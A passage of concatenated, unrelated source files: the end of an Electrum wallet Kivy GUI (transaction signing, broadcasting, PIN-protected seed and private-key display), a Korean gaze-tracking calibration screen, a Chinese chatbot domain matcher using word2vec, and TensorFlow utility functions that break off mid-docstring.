#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def invoices_dialog(self, screen):
from .uix.dialogs.invoices import InvoicesDialog
if len(self.wallet.invoices.sorted_list()) == 0:
self.show_info(' '.join([
_('No saved invoices.'),
_('Signed invoices are saved automatically when you scan them.'),
_('You may also save unsigned requests or contact addresses using the save button.')
]))
return
popup = InvoicesDialog(self, screen, None)
popup.update()
popup.open()
def requests_dialog(self, screen):
from .uix.dialogs.requests import RequestsDialog
if len(self.wallet.get_sorted_requests(self.electrum_config)) == 0:
self.show_info(_('No saved requests.'))
return
popup = RequestsDialog(self, screen, None)
popup.update()
popup.open()
def addresses_dialog(self, screen):
from .uix.dialogs.addresses import AddressesDialog
popup = AddressesDialog(self, screen, None)
popup.update()
popup.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.wallet.has_password():
on_success = lambda pw: f(*(args + (pw,)))
self.password_dialog(self.wallet, msg, on_success, lambda: None)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Enter your PIN code to confirm deletion of {}").format(basename), self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path()
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def password_dialog(self, wallet, msg, on_success, on_failure):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(self, wallet, msg, on_success, on_failure)
self._password_dialog.open()
def change_password(self, cb):
from .uix.dialogs.password_dialog import PasswordDialog
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
message = _("Changing PIN code.") + '\n' + _("Enter your current PIN:")
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.show_info(_("Your PIN code was updated"))
on_failure = lambda: self.show_error(_("PIN codes do not match"))
self._password_dialog.init(self, self.wallet, message, on_success, on_failure, is_change=1)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
calibration.py
|
import sys
import threading
import cv2
import keyboard
import pyautogui
import pandas as pd
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import QImage, QPalette, QBrush
from PyQt5.QtWidgets import QWidget, QApplication
from playsound import playsound
from gaze_tracking import GazeTracking
# 마우스 이벤트 변수
sensitivity_x = 400
is_mouse_down = False
is_next = False
counting = 0
# 음성 출력 함수
def play_narrator(msg, file_name):
playsound("./audio./" + file_name + "_audio.mp3")
print(msg + '가 출력됩니다. - 파일명 : [' + file_name + '_audio.mp3]')
class main(QWidget):
def __init__(self):
super().__init__()
self.setWindowTitle("Calibration")
"""변수 선언"""
self.titleClass = None
# 현재 디스플레이 사이즈
self.screen_width, self.screen_height = pyautogui.size()
# 카메라 초기세팅
self.webCam = 1
self.gaze = GazeTracking()
self.counting = 0
# 설정된 민감도
self.sens = None
self.load_sens() # 파일 안의 값을 기준으로 초기화
# 색상표
self.color = {'gray': (153, 153, 153),
'green': (255, 149, 35),
'darkGray': (51, 51, 51),
'white': (255, 255, 255),
'red': (153, 153, 204)}
# 민감도
self.sensitivity = 1 # (0~2)
# 방향
self.direction = 0 # (0~4, 위, 아래, 왼쪽, 오른쪽)
# rect 시작위치, 종료위치, 텍스트 내용과 위치
self.rectLoc = [
[(700, 185), (750, 235), ("up", (710, 215))],
[(700, 245), (750, 295), ("down", (700, 275))],
[(700, 305), (750, 355), ("left", (706, 335))],
[(700, 365), (750, 415), ("right", (703, 395))]
]
"""버튼,라벨 생성"""
self.btn_next1 = QPushButton(self)
self.btn_next2 = QPushButton(self)
self.btn_next3 = QPushButton(self)
self.btn_next4 = QPushButton(self)
self.textLabel0 = QLabel(self)
self.textLabel1 = QLabel(self)
self.textLabel2 = QLabel(self)
self.textLabel3 = QLabel(self)
self.textLabel4 = QLabel(self)
self.textLabel5 = QLabel(self)
self.textLabel6 = QLabel(self)
self.textLabel7 = QLabel(self)
self.textLabel8 = QLabel(self)
"""버튼, 라벨 붙이기"""
# 다음 버튼
self.btn_next1.setText("다음")
self.btn_next1.setGeometry(900, 920, 200, 100) # x, y, 버튼 가로, 버튼 세로
self.btn_next1.clicked.connect(self.next_clicked)
self.btn_next1.setStyleSheet('border: 2px solid #d0d0d0; font: 30pt "배달의민족 을지로체 TTF"; border-radius: 20px; background-color: rgb(35, 149, 255); border-style: outset; color:white;')
# 뒤로 가기 버튼
self.btn_next4.setText("뒤로가기")
self.btn_next4.setGeometry(1800, 20, 100, 50) # x, y, 버튼 가로, 버튼 세로
self.btn_next4.clicked.connect(self.back_clicked)
self.btn_next4.setStyleSheet(
'border: 2px solid #d0d0d0; font: 14pt "배달의민족 을지로체 TTF"; border-radius: 20px; background-color: rgb(255, 0, 0); border-style: outset; color:white;')
# 플레이 버튼
self.btn_next2.setText("Play")
self.btn_next2.setGeometry(1150, 910, 200, 100) # x, y, 버튼 가로, 버튼 세로
self.btn_next2.clicked.connect(self.play_clicked)
self.btn_next2.setStyleSheet('border: 2px solid #d0d0d0; font: 30pt "배달의민족 을지로체 TTF"; border-radius: 20px; background-color: rgb(35, 149, 255); border-style: outset; color:white;')
# 이전 버튼
self.btn_next3.setText("Back")
self.btn_next3.setGeometry(650, 910, 200, 100) # x, y, 버튼 가로, 버튼 세로
self.btn_next3.clicked.connect(self.set_notice)
self.btn_next3.setStyleSheet('border: 2px solid #d0d0d0; font: 30pt "배달의민족 을지로체 TTF"; border-radius: 20px; background-color: rgb(35, 149, 255); border-style: outset; color:white;')
# 민감도
self.textLabel1.setText(repr(self.sens['up']))
self.textLabel1.resize(1800, 80)
self.textLabel1.move(1000, 220)
self.textLabel1.setStyleSheet("font: 30pt Comic Sans MS")
self.textLabel2.setText(repr(self.sens['down']))
self.textLabel2.resize(1800, 80)
self.textLabel2.move(1020, 340)
self.textLabel2.setStyleSheet("font: 30pt Comic Sans MS")
self.textLabel3.setText(repr(self.sens['left']))
self.textLabel3.resize(1800, 80)
self.textLabel3.move(1020, 460)
self.textLabel3.setStyleSheet("font: 30pt Comic Sans MS")
self.textLabel4.setText(repr(self.sens['right']))
self.textLabel4.resize(1800, 80)
self.textLabel4.move(1040, 580)
self.textLabel4.setStyleSheet("font: 30pt Comic Sans MS")
# csv파일로 부터 읽은 값 보이기
self.show_fix()
self.set_notice()
# threading
self.cam_th = threading.Thread(target=self.cameraON)
self.cam_trigger = False
print('def __init__')
def load_sens(self):
self.r_sens = pd.read_csv('./file/sensitivity.csv') # 파일로 부터 읽어 온 sens 값
self.sens = {'up': self.r_sens['up'], 'down': self.r_sens['down'], 'right': self.r_sens['right'], 'left': self.r_sens['left']}
def valueHandler(self, value):
scaleValue = float(value) / 100
print(scaleValue, type(scaleValue))
def set_notice(self):
# 배경설정 전체 화면에 맞게 설정
self.background_path = "./image/notice.png"
self.oImage = QImage(self.background_path)
self.sImage = self.oImage.scaled(QSize(self.screen_width, self.screen_height))
# 파렛트 설정
self.palette = QPalette()
self.palette.setBrush(10, QBrush(self.sImage))
self.setPalette(self.palette)
self.textLabel1.setVisible(False)
self.textLabel2.setVisible(False)
self.textLabel3.setVisible(False)
self.textLabel4.setVisible(False)
self.btn_next1.setVisible(True)
self.btn_next4.setVisible(True)
self.btn_next2.setVisible(False)
self.btn_next3.setVisible(False)
self.cam_th = threading.Thread(target=self.cameraON)
self.cam_trigger = False
print('def set_notice')
def set_check(self):
# 배경설정 전체 화면에 맞게 설정
self.background_path = "./image/check.png"
self.oImage = QImage(self.background_path)
self.sImage = self.oImage.scaled(QSize(self.screen_width, self.screen_height))
# 파렛트 설정
self.palette = QPalette()
self.palette.setBrush(10, QBrush(self.sImage))
self.setPalette(self.palette)
self.textLabel1.setVisible(True)
self.textLabel2.setVisible(True)
self.textLabel3.setVisible(True)
self.textLabel4.setVisible(True)
self.btn_next1.setVisible(False)
self.btn_next4.setVisible(False)
self.btn_next2.setVisible(True)
self.btn_next3.setVisible(True)
self.textLabel1.setText(repr(self.sens['up'][0]))
self.textLabel2.setText(repr(self.sens['down'][0]))
self.textLabel3.setText(repr(self.sens['left'][0]))
self.textLabel4.setText(repr(self.sens['right'][0]))
print('def set_check')
# notice 화면에 있는 뒤로가기 버튼
def back_clicked(self):
self.titleClass.show()
self.hide()
def play_clicked(self):
'''# 민감도 파일 저장
with open("./file/sensitibity.txt", 'w') as f:
for k in self.sens.values():
f.writelines(str(k))'''
self.titleClass.show()
self.set_notice()
self.hide()
print('def play_clicked')
def open(self):
self.set_check()
self.update()
self.show()
print('def open')
'''def valueHandler(self, value):
pass'''
def cameraON(self):
self.webCam = cv2.VideoCapture(0)
self.cam_trigger = True
print('def cameraON')
def next_clicked(self):
global sensitivity_x
global is_mouse_down
global counting
self.hide()
self.cam_th.run()
# 윈도우 설정
cv2.namedWindow("calibration", cv2.WND_PROP_FULLSCREEN)
cv2.setWindowProperty("calibration", cv2.WND_PROP_FULLSCREEN, cv2.WINDOW_FULLSCREEN)
print('def next_clicked')
while True:
if self.cam_trigger is True:
_, camFrame = self.webCam.read()
camFrame = cv2.flip(camFrame, 1)
camFrame = cv2.resize(camFrame, dsize=(800, 600), interpolation=cv2.INTER_AREA)
# 얼굴 측정
self.gaze.refresh(camFrame)
camFrame = self.gaze.annotated_frame()
# 좌측 상단 텍스트
text = ""
text1 = ""
# if self.gaze.is_blinking():
# text = "Blinking"
if self.gaze.is_right():
text = "Looking right"
elif self.gaze.is_left():
text = "Looking left"
elif self.gaze.is_center():
text = "Looking center"
if self.gaze.is_up():
text1 = "Looking up"
elif self.gaze.is_down():
text1 = "Looking down"
elif self.gaze.is_center():
text1 = "Looking center"
cv2.putText(camFrame, text, (90, 60), cv2.FONT_HERSHEY_DUPLEX, 1.6, (147, 58, 31), 2)
cv2.putText(camFrame, text1, (90, 100), cv2.FONT_HERSHEY_DUPLEX, 1.6, (147, 58, 31), 2)
# 하단의 민감도 기본 회색 틀 (숫자, 원, 텍스트, 네모, 라인, 화살표라인)
cv2.putText(camFrame, repr((sensitivity_x - 250) / 100), (385, 520), cv2.FONT_HERSHEY_DUPLEX, 0.6, self.color["green"], 1)
cv2.line(camFrame, (250, 550), (550, 550), self.color["gray"], 6)
# 우측의 방향 선택
cv2.line(camFrame, (725, 190), (725, 400), self.color["gray"], 2)
cv2.arrowedLine(camFrame, (725, 155), (725, 105), self.color["gray"], 2, tipLength=0.5)
cv2.arrowedLine(camFrame, (725, 445), (725, 495), self.color["gray"], 2, tipLength=0.5)
# 우측 하단의 next 버튼
cv2.rectangle(camFrame, (690, 535), (760, 565), self.color["green"], -1)
cv2.putText(camFrame, "next", (700, 555), cv2.FONT_HERSHEY_DUPLEX, 0.7,
self.color["white"], 1)
# 우측 하단의 init 버튼
cv2.rectangle(camFrame, (590, 535), (660, 565), self.color["green"], -1)
cv2.putText(camFrame, "init", (609, 555), cv2.FONT_HERSHEY_DUPLEX, 0.7, self.color["white"], 1)
# 좌측 하단의 뒤로가기 버튼
cv2.rectangle(camFrame, (100, 535), (170, 565), self.color["gray"], -1)
cv2.putText(camFrame, "back", (108, 555), cv2.FONT_HERSHEY_DUPLEX, 0.7, self.color["darkGray"], 1)
# 슬라이드 선택 원 (파란 원)
cv2.circle(camFrame, (sensitivity_x, 550), 10, self.color['green'], -1)
# 다음 화면 넘어가게 하기
global is_next
if is_next is True:
# 종료시에 webCam 끄고, window 닫고, 다음 화면으로 전환한다.
self.webCam.release()
cv2.destroyAllWindows()
is_next = False
break
# 800 600 네모
for idx in range(len(self.rectLoc)):
if idx is self.direction:
cv2.rectangle(camFrame, self.rectLoc[idx][0], self.rectLoc[idx][1], self.color["green"], -1)
cv2.putText(camFrame, self.rectLoc[idx][2][0], self.rectLoc[idx][2][1], cv2.FONT_HERSHEY_DUPLEX, 0.7, self.color["white"], 1)
else:
cv2.rectangle(camFrame, self.rectLoc[idx][0], self.rectLoc[idx][1], self.color["gray"], -1)
cv2.putText(camFrame, self.rectLoc[idx][2][0], self.rectLoc[idx][2][1], cv2.FONT_HERSHEY_DUPLEX, 0.7, self.color["darkGray"], 1)
if self.gaze.pupils_located:
if self.direction is 0: # recommand up
cv2.putText(camFrame, "recommand : " + str(round(self.gaze.vertical_ratio(),2)), (90,140), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,0,0), 1, cv2.LINE_AA)
elif self.direction is 1: # recommand down
cv2.putText(camFrame, "recommand : " + str(round(self.gaze.vertical_ratio(),2)), (90,140), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,0,0), 1, cv2.LINE_AA)
elif self.direction is 2: # recommand left
cv2.putText(camFrame, "recommand : " + str(round(self.gaze.horizontal_ratio(),2)), (90,140), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,0,0), 1, cv2.LINE_AA)
elif self.direction is 3: #recommand right
cv2.putText(camFrame, "recommand : " + str(round(self.gaze.horizontal_ratio(),2)), (90,140), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255,0,0), 1, cv2.LINE_AA)
else:
pass
# 키보드 입력 및 이벤트
if keyboard.is_pressed('left arrow'):
print('keyboard pressed')
if sensitivity_x > 250:
sensitivity_x -= 1
elif keyboard.is_pressed('right arrow'):
if sensitivity_x < 550:
sensitivity_x += 1
elif keyboard.is_pressed('up arrow'):
if self.direction > 0:
self.direction -= 1
self.show_fix()
elif keyboard.is_pressed('down arrow'):
if self.direction < 3:
self.direction += 1
self.show_fix()
elif keyboard.is_pressed('enter'): # init
if self.direction is 0:
self.sens['up'] = 1.5
elif self.direction is 1:
self.sens['down'] = 1.5
elif self.direction is 2:
self.sens['left'] = 1.5
elif self.direction is 3:
self.sens['right'] = 1.5
self.show_fix()
thread_sound = threading.Thread(target=play_narrator, args=("효과음", "ding",))
thread_sound.start()
elif keyboard.is_pressed('n'):
self.open()
is_next = True
# 키보드 릴리즈 이벤트 수정바람
# elif keyboard.release('down arrow') or keyboard.release('up arrow') or keyboard.release('right arrow') or keyboard.release('left arrow'):
# print('keyboard released')
# self.set_sensitivity()
else:
pass
# 민감도 조절
'''self.gaze.change_limit(self.direction, self.sensitivity)'''
# 윈도우 띄우기
cv2.imshow("calibration", camFrame)
cv2.setMouseCallback('calibration', self.mouseEvent)
if cv2.waitKey(1) == 27:
break
# 수정된 민감도 조정 및 화면에 바로 띄우기
def set_sensitivity(self):
if self.direction is 0:
self.sens['up'] = (sensitivity_x - 250) / 100
elif self.direction is 1:
self.sens['down'] = (sensitivity_x - 250) / 100
elif self.direction is 2:
self.sens['left'] = (sensitivity_x - 250) / 100
elif self.direction is 3:
self.sens['right'] = (sensitivity_x - 250) / 100
self.r_sens['up'] = self.sens['up']
self.r_sens['down'] = self.sens['down']
self.r_sens['right'] = self.sens['right']
self.r_sens['left'] = self.sens['left']
self.r_sens = self.r_sens[['up', 'down', 'right', 'left']]
self.r_sens.to_csv('./file/sensitivity.csv')
self.load_sens()
self.gaze.load_threshold()
# 슬라이드에 fix 된 값 보여주기
def show_fix(self):
global sensitivity_x
if self.direction is 0:
sensitivity_x = int(self.sens['up'] * 100.0 + 250.0)
elif self.direction is 1:
sensitivity_x = int(self.sens['down'] * 100.0 + 250.0)
elif self.direction is 2:
sensitivity_x = int(self.sens['left'] * 100.0 + 250.0)
elif self.direction is 3:
sensitivity_x = int(self.sens['right'] * 100.0 + 250.0)
# 마우스 이벤트
def mouseEvent(self, event, x, y, flags, param):
global sensitivity_x
global is_mouse_down
global is_next
if event == cv2.EVENT_LBUTTONDOWN:
print('button click')
# 슬라이드
if 250 <= x <= 550 and 545 <= y <= 555:
is_mouse_down = True
sensitivity_x = x
# 우측 방향 선택 버튼
if 700 <= x <= 750 and 185 <= y <= 235: # up button
self.direction = 0
self.show_fix()
elif 700 <= x <= 750 and 245 <= y <= 295: # down button
self.direction = 1
self.show_fix()
elif 700 <= x <= 750 and 305 <= y <= 355: # left button
self.direction = 2
self.show_fix()
elif 700 <= x <= 750 and 365 <= y <= 415: # right button
self.direction = 3
self.show_fix()
elif 690 <= x <= 760 and 535 <= y <= 565: # 다음 버튼
self.open()
is_next = True
elif 100 <= x <= 170 and 535 <= y <= 565: # back 버튼
is_next = True
self.cam_th = threading.Thread(target=self.cameraON)
self.showFullScreen()
# 초기화 버튼
elif 590 <= x <= 660 and 535 <= y <= 565: # init 버튼
if self.direction is 0:
self.sens['up'] = 1.5
elif self.direction is 1:
self.sens['down'] = 1.5
elif self.direction is 2:
self.sens['left'] = 1.5
elif self.direction is 3:
self.sens['right'] = 1.5
self.show_fix()
thread_sound = threading.Thread(target=play_narrator, args=("효과음", "ding",))
thread_sound.start()
elif event == cv2.EVENT_MOUSEMOVE and is_mouse_down is True:
print('button click')
if 250 <= x <= 550 and 545 <= y <= 555:
sensitivity_x = x
elif x < 250:
sensitivity_x = 250
elif x > 550:
sensitivity_x = 550
elif event == cv2.EVENT_LBUTTONUP:
is_mouse_down = False
self.set_sensitivity()
def starter(self, titleClass):
self.titleClass = titleClass
self.showFullScreen()
print('def start')
if __name__ == "__main__":
app = QApplication(sys.argv)
form = main()
form.showFullScreen()
sys.exit(app.exec_())
|
matcher.py
|
import os
import json
from app.modules import jieba_tw as jieba_tw
import app.modules.logger.logging as log
from config import BASE_DIR, LOG_DIR
import fnmatch
from app.modules.domain_chatbot.user import User
from gensim.models import word2vec
from app.modules.pinyin_compare import pinyin
import threading
import queue
from time import ctime
class Matcher():
def __init__(self):
try:
# set jieba dict
jieba_tw.set_dictionary(os.path.join(BASE_DIR, 'domain_matcher/jieba_dict/mydict.txt'))
# set stopwords
self.stopword_set = set()
with open(os.path.join(BASE_DIR, 'domain_matcher/jieba_dict/stopwords.txt'),'r', encoding='utf-8') as stopwords:
for stopword in stopwords:
self.stopword_set.add(stopword.strip('\n'))
print('init Matcher')
except:
print('init error')
def load_word2vec_model(self, MODEL_PATH):
try:
self.model = word2vec.Word2Vec.load(MODEL_PATH)
except:
print('load word2vec model error :(')
def load_rule_data(self, RULE_DIR):
file_data = []
for filename in os.listdir(RULE_DIR):
print("Loading: %s" % filename)
with open(os.path.join(RULE_DIR, filename), 'r', encoding = 'UTF-8') as f:
data = json.load(f)
file_data.append(data)
self.rule_data = file_data
def filter_stopwords(self, sentence):
newsen = '' # 去除停用詞後的句子
jieba_tw.load_userdict(os.path.join(BASE_DIR, 'domain_matcher/custom/custom_key_words.txt'))
words = jieba_tw.cut(sentence, cut_all=False)
for word in words:
if word not in self.stopword_set:
newsen += word
return newsen
# flag => 主要功能為判斷是否為專用語設定
# nickname => 區別目前使用者是否有設定專用語
def match_domain(self, sentence, flag=None, user_nickname=None):
# 在未斷詞前先取得句子,之後上傳對話紀錄到資料庫用
User.get_question(sentence, user_nickname)
# 個人化專屬語不需經過斷詞,且domain='none'
if flag == 'user_nickname':
jieba_tw.add_word(sentence, freq=200000)
key_words = jieba_tw.cut(sentence, cut_all=False)
key_words = list(key_words)
print('key_words: %s' % key_words)
else:
newsen = self.filter_stopwords(sentence)
key_words = jieba_tw.cut(newsen, cut_all=False)
key_words = list(key_words)
print('key_words: %s' % key_words)
domain_score = self.match_domain_alg(key_words)
return domain_score
def match_domain_alg(self, key_words):
logger = log.Logging('domain_match')
logger.run(LOG_DIR)
domain_score = []
for word in key_words:
try:
float(word)
dic = {'word': word, 'domain': '數字', 'result': []}
domain_score.append(dic)
except:
exist_case = False
err_message = ''
dic = {'word': word, 'domain': '', 'result': []}
threshold = 0.6
# 180712, 判斷最大機率的domain
max_score = 0
predict_domain = 'none'
for rule in self.rule_data:
domain = rule['domain']
score = 0
concept_count = 0
for concept in rule['concepts']:
try:
similarity = self.model.similarity(word, concept)
score += similarity
concept_count += 1
log_msg = 'similarity: %f, word: %s, concept: %s, score: %f, concept_count: %d' % (
self.model.similarity(word, concept), word, concept, score, concept_count)
logger.debug_msg(log_msg)
print('-----------')
print('similarity:', self.model.similarity(word, concept))
print('word:', word)
print('concept:', concept)
print('concept_count:', concept_count)
except KeyError as err:
exist_case = True
err_message = err
break
if concept_count == 0:
avg_score = 0
else:
avg_score = score / concept_count
# 180712
if avg_score > max_score:
max_score = avg_score
dic['result'].append({domain: avg_score})
# 180712, 只加入最大的預測score
if avg_score>threshold and avg_score==max_score:
predict_domain = domain
dic['domain'] = predict_domain
success_msg = 'result => word: %s, avg_score: %f, this_domain: %s, predict_domain: %s' % (
word, avg_score, domain, predict_domain)
logger.debug_msg(success_msg)
print(success_msg)
else:
print('-----------')
dic['domain'] = predict_domain
fail_msg = 'result => word: %s, avg_score: %f, this_domain: %s, predict_domain: %s' % (
word, avg_score, domain, predict_domain)
logger.debug_msg(fail_msg)
print(fail_msg)
# 180713 如果predict_domain還是none, 也去custom搜尋一遍
if predict_domain == 'none':
exist_case = True
if exist_case:
predict_domain = self.match_custom_key_words(word)
if predict_domain is not None:
dic['domain'] = predict_domain
else:
logger.error_msg(err_message)
print('-----------')
print(err_message)
domain_score.append(dic)
return domain_score
def match_custom_key_words(self, word):
print(word, '進行custom比對')
file_data = []
for filename in os.listdir(os.path.join(BASE_DIR, 'domain_matcher/custom')):
if fnmatch.fnmatch(filename, '*.json'):
with open(os.path.join(BASE_DIR, 'domain_matcher/custom/' + filename), 'r', encoding='UTF-8') as f:
data = json.load(f)
file_data.append(data)
# 多個thread去比對
threads = []
q = queue.Queue()
for rule in file_data:
t = threading.Thread(target=self.custom_compare, args=(q, rule, word))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
if not q.empty():
queue_domain = []
while(not q.empty()):
queue_domain.append(q.get())
print('queue domain items:', queue_domain)
if '是' in queue_domain:
return '是'
elif '非' in queue_domain:
return '非'
else:
return queue_domain[0]
else:
return None
def custom_compare(self, q, rule, word):
domain = rule['domain']
print(domain, 'start thread at :', ctime())
get_result_flag = False
for concept in rule['pinyin_concepts']:
if pinyin.compare_with_pinyin(word, concept):
q.put(domain)
get_result_flag = True
print(domain, 'done thread at :', ctime())
break
if get_result_flag is False:
print(domain, 'done thread at :', ctime())
|
tf_util.py
|
import joblib
import numpy as np
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import copy
import os
import functools
import collections
import multiprocessing
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value (int or bool).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
# Arguments
condition: scalar tensor.
then_expression: TensorFlow operation.
else_expression: TensorFlow operation.
"""
x_shape = copy.copy(then_expression.get_shape())
x = tf.cond(tf.cast(condition, 'bool'),
lambda: then_expression,
lambda: else_expression)
x.set_shape(x_shape)
return x
# ================================================================
# Extras
# ================================================================
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5,
delta * (tf.abs(x) - 0.5 * delta)
)
# ================================================================
# Global session
# ================================================================
def get_session(config=None):
"""Get default session or create one with a given config"""
sess = tf.get_default_session()
if sess is None:
sess = make_session(config=config, make_default=True)
return sess
def make_session(config=None, num_cpu=None, make_default=False, graph=None):
"""Returns a session that will use <num_cpu> CPU's only"""
if num_cpu is None:
num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))
if config is None:
config = tf.ConfigProto(
allow_soft_placement=True,
inter_op_parallelism_threads=num_cpu,
intra_op_parallelism_threads=num_cpu)
config.gpu_options.allow_growth = True
if make_default:
return tf.InteractiveSession(config=config, graph=graph)
else:
return tf.Session(config=config, graph=graph)
def single_threaded_session():
"""Returns a session which will only use a single CPU"""
return make_session(num_cpu=1)
def in_session(f):
@functools.wraps(f)
def newfunc(*args, **kwargs):
with tf.Session():
f(*args, **kwargs)
return newfunc
ALREADY_INITIALIZED = set()
def initialize(sess=None):
"""Initialize all the uninitialized variables in the global scope."""
new_variables = set(tf.global_variables()) - ALREADY_INITIALIZED
if sess is None:
get_session().run(tf.variables_initializer(new_variables))
else:
sess.run(tf.variables_initializer(new_variables))
ALREADY_INITIALIZED.update(new_variables)
# ================================================================
# Model components
# ================================================================
def normc_initializer(std=1.0, axis=0):
def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613
out = np.random.randn(*shape).astype(dtype.as_numpy_dtype)
out *= std / np.sqrt(np.square(out).sum(axis=axis, keepdims=True))
return tf.constant(out)
return _initializer
def conv2d(x, num_filters, name, filter_size=(3, 3), stride=(1, 1), pad="SAME", dtype=tf.float32, collections=None,
summary_tag=None):
with tf.variable_scope(name):
stride_shape = [1, stride[0], stride[1], 1]
filter_shape = [filter_size[0], filter_size[1], int(x.get_shape()[3]), num_filters]
# there are "num input feature maps * filter height * filter width"
# inputs to each hidden unit
fan_in = intprod(filter_shape[:3])
# each unit in the lower layer receives a gradient from:
# "num output feature maps * filter height * filter width" /
# pooling size
fan_out = intprod(filter_shape[:2]) * num_filters
# initialize weights with random weights
w_bound = np.sqrt(6. / (fan_in + fan_out))
w = tf.get_variable("W", filter_shape, dtype, tf.random_uniform_initializer(-w_bound, w_bound),
collections=collections)
b = tf.get_variable("b", [1, 1, 1, num_filters], initializer=tf.zeros_initializer(),
collections=collections)
if summary_tag is not None:
tf.summary.image(summary_tag,
tf.transpose(tf.reshape(w, [filter_size[0], filter_size[1], -1, 1]),
[2, 0, 1, 3]),
max_images=10)
return tf.nn.conv2d(x, w, stride_shape, pad) + b
# ================================================================
# Theano-like Function
# ================================================================
def function(inputs, outputs, updates=None, givens=None):
"""Just like Theano function. Take a bunch of tensorflow placeholders and expressions
computed based on those placeholders and produces f(inputs) -> outputs. Function f takes
values to be fed to the input's placeholders and produces the values of the expressions
in outputs.
Input values can be passed in the same order as inputs or can be provided as kwargs based
on placeholder name (passed to constructor or accessible via placeholder.op.name).
Example:
x = tf.placeholder(tf.int32, (), name="x")
y = tf.placeholder(tf.int32, (), name="y")
z = 3 * x + 2 * y
lin = function([x, y], z, givens={y: 0})
with single_threaded_session():
initialize()
assert lin(2) == 6
assert lin(x=3) == 9
assert lin(2, 2) == 10
assert lin(x=2, y=3) == 12
Parameters
----------
inputs: [tf.placeholder, tf.constant, or object with make_feed_dict method]
list of input arguments
outputs: [tf.Variable] or tf.Variable
